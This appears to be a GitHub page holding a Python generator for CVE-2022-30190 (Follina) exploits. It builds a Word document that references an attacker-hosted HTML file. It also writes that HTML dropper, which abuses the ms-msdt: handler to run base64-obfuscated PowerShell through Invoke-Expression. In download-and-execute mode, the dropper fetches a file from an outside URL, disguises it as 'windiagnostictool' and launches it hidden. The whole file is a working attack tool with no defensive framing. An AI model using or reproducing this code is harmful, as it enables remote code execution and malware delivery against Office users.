-
Notifications
You must be signed in to change notification settings - Fork 1
/
CVE-2022-30190.py
94 lines (75 loc) · 3.93 KB
/
CVE-2022-30190.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
import argparse
import base64
import os
import shutil
import random
import string
import tempfile
import shutil
import os
import random
import base64
import string
from urllib.parse import urlparse
def main(html_url: str, execution_payload: str, download_url: str):
print("[@] Starting CVE-2022-30190 Generator...\n[•] Created by https://github.com/joshuavanderpoll")
# Setup temp workpath / paths
work_dir = os.path.join(tempfile._get_default_tempdir(), next(tempfile._get_candidate_names()))
doc_path = os.path.join(work_dir, "doc")
shutil.copytree("doc", os.path.join(work_dir, doc_path))
# Create exploited reference file
xml_path = os.path.join(work_dir, "./doc/word/_rels/document.xml.rels")
with open(xml_path) as xml_file:
xml_content = xml_file.read()
xml_content = xml_content.replace("{staged_html}", html_url)
with open(xml_path, "w") as xml_file:
xml_file.write(xml_content)
shutil.make_archive("./builds/document", "zip", doc_path)
os.rename("./builds/document.zip", "./builds/document.doc")
print("[√] Exploited Word document saved in \""+"./builds/document.doc\" ("+str(len(xml_content.encode('utf-8')))+" bytes).")
# Generate HTML payload dropper
payload = ""
if download_url:
file_name = os.path.basename(urlparse(download_url).path)
file_ext = file_name.split(".")[-1]
payload = f"(New-Object System.Net.WebClient).DownloadFile(\"{download_url}\",\"$env:TEMP\windiagnostictool.{file_ext}\"); Start-Process -WindowStyle hidden (\"$env:TEMP\windiagnostictool.{file_ext}\"); taskkill /f /im msdt.exe;"
else:
payload = f"taskkill /f /im msdt.exe; {execution_payload};"
if payload == "":
print("[!] Empty payload received.")
exit(1)
payload_encoded = base64.b64encode(payload.encode('utf-8')).decode('utf-8')
html_payload = f"""<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'{payload_encoded}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\\""; //"""
html_payload += ("".join([random.choice(string.ascii_lowercase) for _ in range(4096)]) + "\n</script>")
# Check if file is required size
if(len(html_payload.encode('utf-8')) < 4096):
print("[!] Could not create HTML file higher than 4096 bytes.")
exit(1)
# Write final HTML file
html_file_name = os.path.basename(urlparse(html_url).path)
html_output = open("./builds/"+html_file_name, "w")
html_output.write(html_payload)
html_output.close()
print("[√] Exploit HTML file saved in \""+"./builds/"+html_file_name+"\" ("+str(len(html_payload.encode('utf-8')))+" bytes).")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Generate CVE-2022-30190 Word documents.')
parser.add_argument('--html', type=str, help="URL to online exploit HTML file")
parser.add_argument('--cmd', type=str, help="Command you want to execute on run")
parser.add_argument('--downexec', help="Enable download and execute mode", default=False, action="store_true")
parser.add_argument('--download_url', type=str, help="Source where to download and execute from")
args = parser.parse_args()
if args.downexec and not args.download_url:
print("[!] Please provide --download_url value when using --downexec.")
exit(1)
# Check arguments
if args.html == None:
print("[!] Invalid --html argument.")
exit(1)
if not args.downexec and not args.cmd:
print("[!] Invalid --cmd argument.")
exit(1)
# Setup folders
if os.path.exists("./builds"):
shutil.rmtree("./builds")
os.mkdir("./builds")
main(args.html, args.cmd, args.download_url)